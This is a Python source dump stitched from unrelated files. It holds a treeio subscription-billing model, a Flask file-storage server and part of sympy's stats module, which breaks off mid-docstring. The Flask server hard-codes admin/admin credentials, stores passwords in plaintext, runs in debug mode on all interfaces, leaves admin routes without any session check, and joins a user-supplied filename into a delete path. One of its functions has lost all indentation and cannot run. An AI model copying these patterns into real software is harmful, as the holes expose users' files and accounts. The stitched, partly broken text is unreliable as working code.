        self.cycle_end = datetime.now().date() + self._cycle_delta()
        self.save()

    def activate(self):
        "Activate the subscription, starting a fresh billing cycle"
        if self.active:
            return
        self.renew()
        self.active = True
        self.save()

    def deactivate(self):
        "Deactivate the subscription"
        if not self.active:
            return
        self.active = False
        self.save()

    def invoice(self):
        "Create a new sale order for self"
        new_invoice = SaleOrder()
        try:
            conf = ModuleSetting.get_for_module(
                'treeio.sales', 'default_order_status')[0]
            # Bug fix: the ForeignKey needs a SaleStatus instance; assigning
            # the raw long id raised and always fell through to the fallback.
            new_invoice.status = SaleStatus.objects.get(pk=long(conf.value))
        except Exception:
            ss = SaleStatus.objects.all()[0]
            new_invoice.status = ss
        so = SaleSource.objects.all()[0]
        new_invoice.source = so
        new_invoice.client = self.client
        new_invoice.reference = "Subscription Invoice " + \
            str(datetime.today().strftime('%Y-%m-%d'))
        new_invoice.save()
        try:
            # Copy quantity/discount from the most recent previous line item
            op = self.orderedproduct_set.filter(
                trash=False).order_by('-date_created')[0]
            opn = OrderedProduct()
            opn.order = new_invoice
            opn.product = self.product
            opn.quantity = op.quantity
            opn.discount = op.discount
            opn.subscription = self
            opn.save()
        except IndexError:
            # First invoice for this subscription: default to quantity 1
            opn = OrderedProduct()
            opn.order = new_invoice
            opn.product = self.product
            opn.quantity = 1
            opn.subscription = self
            opn.save()
        return new_invoice.reference

    def check_status(self):
        """
        Checks and sets the state of the subscription.

        Returns 'Inactive', 'Expired', 'Paid', 'Invoiced' or 'Active'; may
        deactivate the subscription or raise a new invoice as a side effect.
        """
        if not self.active:
            return 'Inactive'
        if self.expiry:
            if datetime.now() > datetime.combine(self.expiry, time.min):
                self.deactivate()
                return 'Expired'
        if not self.cycle_end:
            self.renew()
        cycle_end = self.cycle_end
        # check if we're in the 5 day window before the cycle ends for this
        # subscription
        if datetime.now().date() >= cycle_end:
            cycle_start = self.get_cycle_start()
            # if we haven't already invoiced them, invoice them
            grace = 3
            if (datetime.now().date() - cycle_end > timedelta(days=grace)):
                # Subscription has overrun and must be shut down
                return self.deactivate()
            try:
                conf = ModuleSetting.get_for_module(
                    'treeio.sales', 'order_fulfil_status')[0]
                order_fulfil_status = SaleStatus.objects.get(
                    pk=long(conf.value))
            except Exception:
                order_fulfil_status = None
            if self.orderedproduct_set.filter(order__datetime__gte=cycle_start).filter(
                    order__status=order_fulfil_status):
                return 'Paid'
            elif self.orderedproduct_set.filter(order__datetime__gte=cycle_start):
                return 'Invoiced'
            else:
                self.invoice()
                return 'Invoiced'
        else:
            return 'Active'

    def __unicode__(self):
        return unicode(self.product)

    def get_absolute_url(self):
        "Returns absolute URL, or '' when the route cannot be resolved"
        try:
            return reverse('sales_subscription_view', args=[self.id])
        except Exception:
            return ""

    class Meta:
        "Subscription"
        ordering = ['expiry']
class OrderedProduct(Object):
    "Ordered Product: one line item on a SaleOrder"
    # Set when this line item bills a subscription renewal
    subscription = models.ForeignKey(Subscription, blank=True, null=True)
    product = models.ForeignKey(Product)
    quantity = models.DecimalField(max_digits=30, decimal_places=2, default=1)
    # Percentage discount applied in get_total()/get_total_display()
    discount = models.DecimalField(max_digits=5, decimal_places=2, default=0)
    tax = models.ForeignKey(
        Tax, blank=True, null=True, on_delete=models.SET_NULL)
    # Unit price; 'rate' in the order currency, 'rate_display' in the
    # display currency (multiplied by quantity in the totals below)
    rate = models.DecimalField(max_digits=20, decimal_places=2)
    rate_display = models.DecimalField(
        max_digits=20, decimal_places=2, default=0)
    order = models.ForeignKey(SaleOrder)
    description = models.TextField(blank=True, null=True)
    fulfilled = models.BooleanField(default=False)
    access_inherit = ('order', '*module', '*user')
    def __unicode__(self):
        return unicode(self.product)
    def get_absolute_url(self):
        "Returns absolute URL, or '' when the route cannot be resolved"
        try:
            return reverse('sales_ordered_view', args=[self.id])
        except Exception:
            return ""
    def get_total(self):
        "Returns total sum for this item"
        # rate * quantity, minus percentage discount, clamped at zero,
        # rounded up to cents
        total = self.rate * self.quantity
        if self.discount:
            total = total - (total * self.discount / 100)
        if total < 0:
            total = Decimal(0)
        return total.quantize(Decimal('.01'), rounding=ROUND_UP)
    def get_total_display(self):
        "Returns total sum for this item in the display currency"
        total = self.rate_display * self.quantity
        if self.discount:
            total = total - (total * self.discount / 100)
        if total < 0:
            total = Decimal(0)
        return total.quantize(Decimal('.01'), rounding=ROUND_UP)
    class Meta:
        ordering = ['product']
|
|
import os
import shutil
from sqlite3 import dbapi2 as sqlite3
from flask import Flask, request, session, g, redirect, url_for, abort, \
flash, render_template
from werkzeug.utils import secure_filename
from contextlib import closing
from werkzeug import utils, secure_filename
# configuration -- loaded into app.config via from_object(__name__) below,
# then optionally overridden by the file named in $CURLYSERV_CONF.
# NOTE(review): hard-coded admin/admin credentials, a 'dev key' secret and
# DEBUG = True are development-only settings; override them in production.
DATABASE = '/tmp/curlyserver.db'
DEBUG = True
SECRET_KEY = 'dev key'
ROOT_USERNAME = 'admin'
ROOT_PASSWORD = 'admin'
# Root directory holding one sub-directory of files per user
STORAGE = '/tmp/curlyserver'
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
app = Flask(__name__)
app.config.from_object(__name__)
app.config.from_envvar('CURLYSERV_CONF', silent=True)
# Connection to database
def connect_db():
    """Open a new SQLite connection to the configured database file."""
    db_path = app.config['DATABASE']
    return sqlite3.connect(db_path)
def try_login(username, password):
    """Return True when *username* exists and *password* matches.

    Bug fix: the old code tested the cursor object (which is never None)
    instead of the fetched row, so a non-existent user crashed with a
    TypeError on fetchone()[0] instead of returning False.
    """
    db = connect_db()
    row = db.execute('select password from users where username = (?)',
                     [username]).fetchone()
    if row is None:
        return False
    # NOTE(review): passwords are stored and compared in plain text --
    # should be hashed (e.g. werkzeug.security check_password_hash).
    return row[0] == password
def get_space(username):
    """Return the number of bytes still free in the user's storage quota."""
    db = connect_db()
    cursor = db.cursor()
    row = cursor.execute(
        'select storage, used_storage from users where username = (?)',
        [username]).fetchone()
    total_storage, used_storage = row
    return total_storage - used_storage
def get_files(username):
    """Return the list of filenames stored for *username*.

    Bug fix: the old code returned False for an empty directory, which made
    callers comparing against [] never match and made iterating the result
    crash.  An empty list is still falsy, so truth-value callers keep
    working unchanged.
    """
    return os.listdir(os.path.join(app.config['STORAGE'], username))
# Check if you can upload file
def allowed_file(filename):
    """True when *filename* has an extension on the ALLOWED_EXTENSIONS whitelist."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1]
    return extension in ALLOWED_EXTENSIONS
# Main upload function
@app.route('/upload', methods=['POST'])
def upload():
    """Store an uploaded file for an authenticated user and charge the quota.

    Returns 'OK' on success, 'ME' when the quota would be exceeded and 'AE'
    on authentication failure.

    Bug fix: the stream was seeked to EOF to measure its size and never
    rewound, so FileStorage.save() -- which copies from the current
    position -- wrote an empty file.
    """
    username = request.form.get('username')
    password = request.form.get('password')
    if not try_login(username, password):
        return 'AE'
    file = request.files['file']
    # Measure the upload size, then rewind before saving.
    file.seek(0, os.SEEK_END)
    file_length = file.tell()
    file.seek(0)
    if file_length > get_space(username):
        return 'ME'
    filename = secure_filename(file.filename)
    file.save(os.path.join(app.config['STORAGE'], username, filename))
    db = connect_db()
    used_space = db.execute('select used_storage from users where username = (?)',
                            [username]).fetchone()[0]
    db.execute('update users set used_storage = (?) where username = (?)',
               [used_space + file_length, username])
    db.commit()
    return 'OK'
# Functions for administration purposes
@app.route('/')
def show_users():
    """Render the admin overview listing every user and their quota usage."""
    db = connect_db()
    cursor = db.execute(
        'select username, storage, used_storage from users order by id asc')
    users = [
        {'username': name, 'storage': storage, 'used_storage': used}
        for name, storage, used in cursor.fetchall()
    ]
    return render_template('show_users.html', users=users)
def change_space(username, new_value):
    """Set a user's total storage quota to *new_value* bytes.

    Bug fix: the UPDATE was never committed, so the change was silently
    lost when the connection was closed/garbage-collected.
    """
    db = connect_db()
    db.execute('update users set storage = (?) where username = (?)',
               [new_value, username])
    db.commit()
@app.route('/change_space/<username>', methods=['POST'])
def change(username):
    """Admin form handler: set a user's quota from the posted 'bytes' field.

    Bug fix: the UPDATE was never committed, so the new quota was lost.
    """
    db = connect_db()
    value = int(request.form['bytes'])
    db.execute('update users set storage = (?) where username = (?)',
               [value, username])
    db.commit()
    return redirect(url_for('show_users'))
# Administrator login function
@app.route('/root_login', methods=['GET', 'POST'])
def root_login():
    """Log the administrator in against the configured root credentials."""
    error = None
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        if username != app.config['ROOT_USERNAME']:
            error = 'Invalid username'
        elif password != app.config['ROOT_PASSWORD']:
            error = 'Invalid password'
        else:
            session['logged_in'] = True
            flash('You were logged in as admin')
            return redirect(url_for('show_users'))
    return render_template('login.html', error=error)
# Administrator logout function
@app.route('/root_logout')
def root_logout():
    """Drop the admin session flag and return to the user overview."""
    session.pop('logged_in', None)
    flash('You were logged out')
    return redirect(url_for('show_users'))
# Add new user through the form
@app.route('/add_user', methods=['POST'])
def add_user():
    """Create a user from the admin form, including their storage directory."""
    username = request.form['username']
    db = connect_db()
    try:
        db.execute('insert into users (username, password) values (?, ?)',
                   [username, request.form['password']])
        db.commit()
    except sqlite3.IntegrityError:
        # Username is the unique key; report the duplicate and bail out.
        flash('This username already exists')
        return redirect(url_for('show_users'))
    os.mkdir(os.path.join(app.config['STORAGE'], username))
    return redirect(url_for('show_users'))
@app.route('/show_files', methods=['POST'])
def show_files():
    """Render the file listing for the requested user.

    Bug fix: render_template() takes template context as keyword arguments
    only; the old positional call raised TypeError on every request.
    """
    username = request.form['user']
    files = get_files(username)
    if not files:
        files = []
    # NOTE(review): assumes the template iterates a variable named 'files'
    # -- confirm against show_files.html.
    return render_template('show_files.html', files=files)
# Remove existing user
@app.route('/remove_user', methods=['POST'])
def remove_user():
    """Delete a user row and their storage directory.

    Bug fix: SQL parameters must be a sequence of values; passing the bare
    string bound each character separately, raising ProgrammingError for
    any username longer than one character.
    """
    uname = request.form['username']
    db = connect_db()
    db.execute('delete from users where (username) = (?)', [uname])
    db.commit()
    shutil.rmtree(os.path.join(app.config['STORAGE'], uname))
    return redirect(url_for('show_users'))
# Main login function
@app.route('/login', methods=['GET', 'POST'])
def login():
    """JSON login endpoint for both the administrator and regular users.

    Bug fixes: the old code called the undefined get_db() (NameError) and
    invoked the root_login *view function* -- which takes no arguments --
    with two arguments (TypeError).  Admin credentials are now checked
    directly against the app configuration.
    """
    username = request.json.get('username')
    password = request.json.get('password')
    if (username == app.config['ROOT_USERNAME'] and
            password == app.config['ROOT_PASSWORD']):
        session['logged_in'] = True
        session['username'] = username
        return 'Logged in as administrator'
    db = connect_db()
    row = db.execute('select password from users where username = (?)',
                     [username]).fetchone()
    if row is None:
        return 'Wrong username'
    if row[0] == password:
        session['logged_in'] = True
        session['username'] = username
        return 'Logged in as user'
    return 'Wrong password'
@app.route('/logout')
def logout():
    """Clear the session and acknowledge with plain text.

    Bug fix: a Flask view may not return a bool; returning True raised a
    TypeError, so the acknowledgement is now sent as the string 'True'.
    """
    session.pop('logged_in', None)
    session.pop('username', None)
    return 'True'
@app.route('/register', methods=['POST'])
def register():
    """Create a new user account and its storage directory.

    Bug fix: the storage directory lookup used the misspelled config key
    'STORAGES', raising KeyError after every successful insert.
    """
    username = request.json.get('username')
    password = request.json.get('password')
    db = connect_db()
    try:
        db.execute('insert into users (username, password) values (?, ?)',
                   [username, password])
        db.commit()
        os.mkdir(os.path.join(app.config['STORAGE'], username))
    except sqlite3.IntegrityError:
        return 'Username already exists'
    return 'Registration is successful'
@app.route('/logged_in')
def logged_in():
    """Report whether the current session is authenticated.

    Bug fix: indexing session['logged_in'] raised KeyError for fresh
    sessions; session.get() treats a missing key as logged out.
    """
    if session.get('logged_in'):
        return 'Yes'
    return 'No'
# interfaces for contacting with client
# Sign in
@app.route('/signin', methods=['POST'])
def Nsignin():
    """Client sign-in check; answers 'OK'/'AE' like the sibling endpoints.

    Bug fixes: a Flask view may not return a bool (True/False raised a
    TypeError on every request), and an unused database connection was
    opened and leaked.
    """
    username = request.json.get('username')
    password = request.json.get('password')
    if try_login(username, password):
        return 'OK'
    return 'AE'
# Get list of files
@app.route('/listoffiles', methods=['GET', 'POST'])
def Nlistoffiles():
username = request.json.get('username')
password = request.json.get('password')
if try_login(username, password):
if get_files(username) == []:
return 'No files'
else:
l = get_files(username)
for a in l:
print a
return 'List of all files is above.'
@app.route('/download', methods=['POST'])
def Ndownload():
    """Send the requested file to an authenticated user, or 'AE' on failure.

    Bug fix: send_from_directory was never imported (it is absent from the
    module's flask import list), so every authenticated download raised
    NameError.  Imported locally to keep this fix self-contained.
    """
    from flask import send_from_directory
    username = request.args.get('username')
    password = request.args.get('password')
    file = request.args.get('file')
    if try_login(username, password):
        return send_from_directory(os.path.join(app.config['STORAGE'], username), file)
    else:
        return 'AE'
@app.route('/remove', methods=['POST'])
def Nremove():
    """Delete a user's file and refund its size to their quota.

    Bug fixes vs. the original: the file was stat()ed before the login and
    existence checks (crashing for missing files); the freed bytes were
    *added* to used_storage and then the raw file size was written as the
    new used_storage; and the view answered 'No such file' even after a
    successful delete.
    """
    username = request.form.get('username')
    password = request.form.get('password')
    filename = request.form.get('filename')
    if not try_login(username, password):
        return 'Login is incorrect'
    path = os.path.join(app.config['STORAGE'], username, filename)
    if not os.path.exists(path):
        return 'No such file'
    filesize = os.stat(path).st_size
    os.remove(path)
    db = connect_db()
    used_space = db.execute('select used_storage from users where username = (?)',
                            [username]).fetchone()[0]
    db.execute('update users set used_storage = (?) where username = (?)',
               [used_space - filesize, username])
    db.commit()
    return 'OK'
# Run the development server, reachable on every interface.
# NOTE(review): binding 0.0.0.0 with DEBUG = True exposes the Werkzeug
# debugger to the network -- do not deploy this configuration.
if __name__ == '__main__':
    app.run(host='0.0.0.0')
|
|
"""
Main Random Variables Module
Defines abstract random variable type.
Contains interfaces for probability space object (PSpace) as well as standard
operators, P, E, sample, density, where
See Also
========
sympy.stats.crv
sympy.stats.frv
sympy.stats.rv_interface
"""
from __future__ import print_function, division
from sympy import (Basic, S, Expr, Symbol, Tuple, And, Add, Eq, lambdify,
sympify, Equality, solve, Lambda, DiracDelta)
from sympy.core.compatibility import reduce
from sympy.sets.sets import FiniteSet, ProductSet
from sympy.abc import x
class RandomDomain(Basic):
    """
    Represents a set of variables and the values which they can take

    See Also
    ========
    sympy.stats.crv.ContinuousDomain
    sympy.stats.frv.FiniteDomain
    """
    # Subclasses flip these flags instead of relying on isinstance checks
    is_ProductDomain = False
    is_Finite = False
    is_Continuous = False

    def __new__(cls, symbols, *args):
        # Normalise the symbol collection into a FiniteSet so args[0]
        # always has set semantics
        symbols = FiniteSet(*symbols)
        return Basic.__new__(cls, symbols, *args)

    @property
    def symbols(self):
        # The FiniteSet of symbols stored by __new__
        return self.args[0]

    @property
    def set(self):
        # The set of values the symbols may take (supplied by subclasses)
        return self.args[1]

    def __contains__(self, other):
        raise NotImplementedError()

    def integrate(self, expr):
        raise NotImplementedError()
class SingleDomain(RandomDomain):
    """
    A single variable and its domain

    See Also
    ========
    sympy.stats.crv.SingleContinuousDomain
    sympy.stats.frv.SingleFiniteDomain
    """
    def __new__(cls, symbol, set):
        # NOTE(review): assert is stripped under 'python -O'; an explicit
        # raise would be safer, but changing it would alter the exception
        # type callers currently see.
        assert symbol.is_Symbol
        return Basic.__new__(cls, symbol, set)

    @property
    def symbol(self):
        return self.args[0]

    @property
    def symbols(self):
        # Present the single symbol with the same set interface as the base
        return FiniteSet(self.symbol)

    def __contains__(self, other):
        # 'other' is expected to be a collection of (symbol, value) pairs;
        # a single-variable domain can only contain exactly one such pair.
        if len(other) != 1:
            return False
        sym, val = tuple(other)[0]
        return self.symbol == sym and val in self.set
class ConditionalDomain(RandomDomain):
    """
    A RandomDomain with an attached condition

    See Also
    ========
    sympy.stats.crv.ConditionalContinuousDomain
    sympy.stats.frv.ConditionalFiniteDomain
    """
    def __new__(cls, fulldomain, condition):
        # Express the condition in terms of the plain symbols instead of
        # their RandomSymbol wrappers before storing it
        condition = condition.xreplace(dict((rs, rs.symbol)
            for rs in random_symbols(condition)))
        return Basic.__new__(cls, fulldomain, condition)

    @property
    def symbols(self):
        return self.fulldomain.symbols

    @property
    def fulldomain(self):
        # The unconditioned domain being restricted
        return self.args[0]

    @property
    def condition(self):
        return self.args[1]

    @property
    def set(self):
        raise NotImplementedError("Set of Conditional Domain not Implemented")

    def as_boolean(self):
        # The domain as a boolean predicate: fulldomain AND condition
        return And(self.fulldomain.as_boolean(), self.condition)
class PSpace(Basic):
    """
    A Probability Space

    Probability Spaces encode processes that equal different values
    probabilistically. These underlie Random Symbols which occur in SymPy
    expressions and contain the mechanics to evaluate statistical statements.

    See Also
    ========
    sympy.stats.crv.ContinuousPSpace
    sympy.stats.frv.FinitePSpace
    """
    # Tri-state flags: None (unknown) here, set True/False by subclasses
    is_Finite = None
    is_Continuous = None
    is_real = None

    @property
    def domain(self):
        # The RandomDomain describing variables and their value sets
        return self.args[0]

    @property
    def density(self):
        return self.args[1]

    @property
    def values(self):
        # Each domain symbol wrapped as a RandomSymbol tied to this space
        return frozenset(RandomSymbol(self, sym) for sym in self.domain.symbols)

    @property
    def symbols(self):
        return self.domain.symbols

    def where(self, condition):
        raise NotImplementedError()

    def compute_density(self, expr):
        raise NotImplementedError()

    def sample(self):
        raise NotImplementedError()

    def probability(self, condition):
        raise NotImplementedError()

    def integrate(self, expr):
        raise NotImplementedError()
class SinglePSpace(PSpace):
    """
    Represents the probabilities of a set of random events that can be
    attributed to a single variable/symbol.
    """
    def __new__(cls, s, distribution):
        # Accept either a plain name or an actual Symbol.
        if isinstance(s, str):
            s = Symbol(s)
        if not isinstance(s, Symbol):
            raise TypeError("s should have been string or Symbol")
        return Basic.__new__(cls, s, distribution)

    @property
    def symbol(self):
        return self.args[0]

    @property
    def distribution(self):
        return self.args[1]

    @property
    def value(self):
        # The RandomSymbol users manipulate in expressions.
        return RandomSymbol(self, self.symbol)

    @property
    def pdf(self):
        # Density of the distribution evaluated at this space's symbol.
        return self.distribution.pdf(self.symbol)
class RandomSymbol(Expr):
    """
    Random Symbols represent ProbabilitySpaces in SymPy Expressions.

    In principle they can take on any value that their symbol can take on
    within the associated PSpace with probability determined by the PSpace
    density.

    Random Symbols contain ``pspace`` and ``symbol`` properties.
    The ``pspace`` property points to the represented Probability Space.
    The ``symbol`` is a standard SymPy Symbol that is used in that
    probability space, for example in defining a density.

    You can form normal SymPy expressions using RandomSymbols and operate on
    those expressions with the functions

    E - Expectation of a random expression
    P - Probability of a condition
    density - Probability Density of an expression
    given - A new random expression (with new random symbols) given a condition

    An object of the RandomSymbol type should almost never be created by the
    user.  They tend to be created instead by the PSpace class's ``value``
    method.  Traditionally a user doesn't even do this but instead calls one
    of the convenience functions Normal, Exponential, Coin, Die, FiniteRV,
    etc....
    """
    # Behave like an atomic, differentiable symbol in the core.
    is_bounded = True
    is_finite = True
    is_Symbol = True
    is_Atom = True
    _diff_wrt = True

    def __new__(cls, pspace, symbol):
        if not isinstance(symbol, Symbol):
            raise TypeError("symbol should be of type Symbol")
        if not isinstance(pspace, PSpace):
            raise TypeError("pspace variable should be of type PSpace")
        return Basic.__new__(cls, pspace, symbol)

    @property
    def pspace(self):
        return self.args[0]

    @property
    def symbol(self):
        return self.args[1]

    @property
    def name(self):
        return self.symbol.name

    # Assumptions are delegated to the underlying symbol (and, for
    # realness, to the space).
    @property
    def is_positive(self):
        return self.symbol.is_positive

    @property
    def is_integer(self):
        return self.symbol.is_integer

    @property
    def is_real(self):
        return self.symbol.is_real or self.pspace.is_real

    @property
    def is_commutative(self):
        return self.symbol.is_commutative

    def _hashable_content(self):
        return self.pspace, self.symbol

    @property
    def free_symbols(self):
        # A RandomSymbol is itself a free symbol.
        return set([self])
class ProductPSpace(PSpace):
    """
    A probability space resulting from the merger of two independent probability
    spaces.

    Often created using the function, pspace
    """
    def __new__(cls, *spaces):
        # Map each random value to the component space that produced it.
        rs_space_dict = {}
        for space in spaces:
            for value in space.values:
                rs_space_dict[value] = space
        symbols = FiniteSet(val.symbol for val in rs_space_dict.keys())
        # Overlapping symbols
        if len(symbols) < sum(len(space.symbols) for space in spaces):
            raise ValueError("Overlapping Random Variables")
        # Specialize the class when every component is of the same kind so
        # the result inherits finite/continuous behaviour.
        if all(space.is_Finite for space in spaces):
            from sympy.stats.frv import ProductFinitePSpace
            cls = ProductFinitePSpace
        if all(space.is_Continuous for space in spaces):
            from sympy.stats.crv import ProductContinuousPSpace
            cls = ProductContinuousPSpace
        # FiniteSet deduplicates and canonically orders the spaces.
        obj = Basic.__new__(cls, *FiniteSet(*spaces))
        return obj

    @property
    def rs_space_dict(self):
        # Recomputed mapping from RandomSymbol to its owning space.
        d = {}
        for space in self.spaces:
            for value in space.values:
                d[value] = space
        return d

    @property
    def symbols(self):
        return FiniteSet(val.symbol for val in self.rs_space_dict.keys())

    @property
    def spaces(self):
        return FiniteSet(*self.args)

    @property
    def values(self):
        return sumsets(space.values for space in self.spaces)

    def integrate(self, expr, rvs=None, **kwargs):
        # Integrate out only the requested random variables (default: all),
        # delegating each subset to its own component space.
        rvs = rvs or self.values
        rvs = frozenset(rvs)
        for space in self.spaces:
            expr = space.integrate(expr, rvs & space.values, **kwargs)
        return expr

    @property
    def domain(self):
        return ProductDomain(*[space.domain for space in self.spaces])

    @property
    def density(self):
        raise NotImplementedError("Density not available for ProductSpaces")

    def sample(self):
        # Merge the independent samples of every component space.
        return dict([(k, v) for space in self.spaces
                     for k, v in space.sample().items()])
class ProductDomain(RandomDomain):
    """
    A domain resulting from the merger of two independent domains

    See Also
    ========
    sympy.stats.crv.ProductContinuousDomain
    sympy.stats.frv.ProductFiniteDomain
    """
    is_ProductDomain = True

    def __new__(cls, *domains):
        symbols = sumsets([domain.symbols for domain in domains])
        # Flatten any product of products
        domains2 = []
        for domain in domains:
            if not domain.is_ProductDomain:
                domains2.append(domain)
            else:
                domains2.extend(domain.domains)
        # NOTE(review): the list is passed whole, not star-unpacked; this
        # relies on FiniteSet accepting an iterable — confirm against the
        # sympy version in use.
        domains2 = FiniteSet(domains2)
        # Specialize when every component domain is of the same kind.
        if all(domain.is_Finite for domain in domains2):
            from sympy.stats.frv import ProductFiniteDomain
            cls = ProductFiniteDomain
        if all(domain.is_Continuous for domain in domains2):
            from sympy.stats.crv import ProductContinuousDomain
            cls = ProductContinuousDomain
        return Basic.__new__(cls, *domains2)

    @property
    def sym_domain_dict(self):
        # Map each symbol back to the component domain that owns it.
        return dict((symbol, domain) for domain in self.domains
                    for symbol in domain.symbols)

    @property
    def symbols(self):
        return FiniteSet(sym for domain in self.domains
                         for sym in domain.symbols)

    @property
    def domains(self):
        return self.args

    @property
    def set(self):
        return ProductSet(domain.set for domain in self.domains)

    def __contains__(self, other):
        # Split event into each subdomain
        for domain in self.domains:
            # Collect the parts of this event which associate to this domain
            elem = frozenset([item for item in other
                              if item[0] in domain.symbols])
            # Test this sub-event
            if elem not in domain:
                return False
        # All subevents passed
        return True

    def as_boolean(self):
        return And(*[domain.as_boolean() for domain in self.domains])
def random_symbols(expr):
    """
    Returns all RandomSymbols within a SymPy Expression.

    Objects without an ``atoms`` method contain no random symbols, so an
    empty list is returned for them.
    """
    try:
        atoms = expr.atoms(RandomSymbol)
    except AttributeError:
        return []
    return list(atoms)
def pspace(expr):
    """
    Returns the underlying Probability Space of a random expression.

    For internal use.

    Examples
    ========
    >>> from sympy.stats import pspace, Normal
    >>> from sympy.stats.rv import ProductPSpace
    >>> X = Normal('X', 0, 1)
    >>> pspace(2*X + 1) == X.pspace
    True
    """
    rvs = random_symbols(expr)
    if not rvs:
        # Deterministic expressions have no probability space.
        return None
    spaces = [rv.pspace for rv in rvs]
    # A single shared space can be returned directly.
    if all(space == spaces[0] for space in spaces):
        return spaces[0]
    # Otherwise merge the independent spaces into a product space.
    return ProductPSpace(*spaces)
def sumsets(sets):
    """
    Union of sets, returned as a frozenset.
    """
    result = frozenset()
    for s in sets:
        result = result.union(s)
    return result
def rs_swap(a, b):
    """
    Build a dictionary to swap RandomSymbols based on their underlying symbol.

    i.e.
    if    ``X = ('x', pspace1)``
    and   ``Y = ('x', pspace2)``
    then ``X`` and ``Y`` match and the key, value pair
    ``{X:Y}`` will appear in the result

    Inputs: collections a and b of random variables which share common symbols
    Output: dict mapping RVs in a to RVs in b
    """
    swap = {}
    for rv_a in a:
        # Pick the first member of b sharing this underlying symbol.
        matches = [rv_b for rv_b in b if rv_b.symbol == rv_a.symbol]
        swap[rv_a] = matches[0]
    return swap
def given(expr, condition=None, **kwargs):
    """ Conditional Random Expression
    From a random expression and a condition on that expression creates a new
    probability space from the condition and returns the same expression on that
    conditional probability space.

    Examples
    ========
    >>> from sympy.stats import given, density, Die
    >>> X = Die('X', 6)
    >>> Y = given(X, X>3)
    >>> density(Y).dict
    {4: 1/3, 5: 1/3, 6: 1/3}

    Following convention, if the condition is a random symbol then that symbol
    is considered fixed.

    >>> from sympy.stats import Normal
    >>> from sympy import pprint
    >>> from sympy.abc import z
    >>> X = Normal('X', 0, 1)
    >>> Y = Normal('Y', 0, 1)
    >>> pprint(density(X + Y, Y)(z), use_unicode=False)
                    2
           -(-Y + z)
           -----------
      ___       2
    \/ 2 *e
    ------------------
            ____
        2*\/ pi
    """
    # Nothing to do when the condition is deterministic or involves random
    # variables independent of those in expr.
    if not random_symbols(condition) or pspace_independent(expr, condition):
        return expr
    # A bare random symbol condition means "hold this variable fixed".
    if isinstance(condition, RandomSymbol):
        condition = Eq(condition, condition.symbol)
    condsymbols = random_symbols(condition)
    # Single-variable equality over an unconditioned space: substitute the
    # solved value(s) directly instead of building a conditional space.
    if (isinstance(condition, Equality) and len(condsymbols) == 1 and
            not isinstance(pspace(expr).domain, ConditionalDomain)):
        rv = tuple(condsymbols)[0]
        results = solve(condition, rv)
        return sum(expr.subs(rv, res) for res in results)
    # Get full probability space of both the expression and the condition
    fullspace = pspace(Tuple(expr, condition))
    # Build new space given the condition
    space = fullspace.conditional_space(condition, **kwargs)
    # Dictionary to swap out RandomSymbols in expr with new RandomSymbols
    # That point to the new conditional space
    swapdict = rs_swap(fullspace.values, space.values)
    # Swap random variables in the expression
    expr = expr.xreplace(swapdict)
    return expr
def expectation(expr, condition=None, numsamples=None, evaluate=True, **kwargs):
    """
    Returns the expected value of a random expression.

    Parameters
    ==========
    expr : Expr containing RandomSymbols
        The expression of which you want to compute the expectation value
    condition : Expr containing RandomSymbols
        A conditional expression. E(X, X>0) is expectation of X given X > 0
    numsamples : int
        Enables sampling and approximates the expectation with this many samples
    evaluate : Bool (defaults to True)
        In case of continuous systems return unevaluated integral

    Examples
    ========
    >>> from sympy.stats import E, Die
    >>> X = Die('X', 6)
    >>> E(X)
    7/2
    >>> E(2*X + 1)
    8
    >>> E(X, X>3) # Expectation of X given that it is above 3
    5
    """
    # A deterministic expression is its own expectation.
    if not random_symbols(expr):
        return expr
    # Monte Carlo approximation when a sample count is given.
    if numsamples:
        return sampling_E(expr, condition, numsamples=numsamples)
    # Condition first, then take the unconditional expectation.
    if condition is not None:
        return expectation(given(expr, condition), evaluate=evaluate)
    # Expectation is linear: distribute over sums for efficiency.
    if expr.is_Add:
        return Add(*[expectation(term, evaluate=evaluate)
                     for term in expr.args])
    # Otherwise case is simple, pass work off to the ProbabilitySpace.
    result = pspace(expr).integrate(expr)
    if evaluate and hasattr(result, 'doit'):
        return result.doit(**kwargs)
    return result
def probability(condition, given_condition=None, numsamples=None,
                evaluate=True, **kwargs):
    """
    Probability that a condition is true, optionally given a second condition.

    Parameters
    ==========
    condition : Relational containing RandomSymbols
        The condition of which you want to compute the probability
    given_condition : Relational containing RandomSymbols
        A conditional expression. P(X>1, X>0) is expectation of X>1 given X>0
    numsamples : int
        Enables sampling and approximates the probability with this many samples
    evaluate : Bool (defaults to True)
        In case of continuous systems return unevaluated integral

    Examples
    ========
    >>> from sympy.stats import P, Die
    >>> from sympy import Eq
    >>> X, Y = Die('X', 6), Die('Y', 6)
    >>> P(X>3)
    1/2
    >>> P(Eq(X, 5), X>2) # Probability that X == 5 given that X > 2
    1/4
    >>> P(X>Y)
    5/12
    """
    # Monte Carlo estimate when a sample count is given.
    if numsamples:
        return sampling_P(condition, given_condition, numsamples=numsamples,
                          **kwargs)
    # Condition first, then compute an unconditional probability.
    if given_condition is not None:
        return probability(given(condition, given_condition, **kwargs), **kwargs)
    # Otherwise pass work off to the ProbabilitySpace.
    result = pspace(condition).probability(condition, **kwargs)
    if evaluate and hasattr(result, 'doit'):
        return result.doit()
    return result
class Density(Basic):
    """Unevaluated density of a random expression.

    ``args[0]`` is the expression; the optional ``args[1]`` is a condition
    to condition the density on.
    """
    expr = property(lambda self: self.args[0])

    @property
    def condition(self):
        if len(self.args) > 1:
            return self.args[1]
        else:
            return None

    def doit(self, evaluate=True, **kwargs):
        # Compute the density, conditioning first when a condition is attached.
        expr, condition = self.expr, self.condition
        if condition is not None:
            # Recompute on new conditional expr
            expr = given(expr, condition, **kwargs)
        if not random_symbols(expr):
            # Deterministic value: the density collapses to a delta spike.
            # NOTE(review): ``x`` is a free name here, presumably a
            # module-level Symbol defined elsewhere in this file — confirm.
            return Lambda(x, DiracDelta(x - expr))
        if (isinstance(expr, RandomSymbol) and
                hasattr(expr.pspace, 'distribution') and
                isinstance(pspace(expr), SinglePSpace)):
            # A bare random symbol: return its distribution object directly.
            return expr.pspace.distribution
        result = pspace(expr).compute_density(expr, **kwargs)
        if evaluate and hasattr(result, 'doit'):
            return result.doit()
        else:
            return result
def density(expr, condition=None, evaluate=True, numsamples=None, **kwargs):
    """
    Probability density of a random expression, optionally given a second
    condition.

    This density will take on different forms for different types of
